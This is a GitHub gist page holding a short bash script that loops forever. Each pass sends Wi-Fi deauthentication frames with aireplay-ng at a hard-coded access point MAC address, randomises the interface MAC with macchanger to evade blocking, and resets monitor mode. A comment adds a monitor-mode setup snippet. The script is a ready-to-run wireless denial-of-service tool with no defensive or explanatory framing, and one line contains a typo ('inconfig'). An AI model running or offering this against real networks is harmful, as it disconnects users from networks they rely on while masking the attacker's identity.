Skip to content

Instantly share code, notes, and snippets.

@bee-san
Created December 16, 2015 23:05
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bee-san/4851bd4836c2db314f22 to your computer and use it in GitHub Desktop.
Save bee-san/4851bd4836c2db314f22 to your computer and use it in GitHub Desktop.
#!/bin/bash
while true
do
aireplay-ng -0 5 -a 90:f6:52:c1:bb:18 wlan0
ifconfig wlan0 down
macchanger -r wlan0 | grep "New MAC"
iwconfig wlan0 mode monitor
inconfig up
iwconfig wlan0 | grep Mode
sleep 3
echo Waiting!!!!
done
@bee-san
Copy link
Author

bee-san commented Dec 16, 2015

!/bin/bash

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 | grep Mode

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment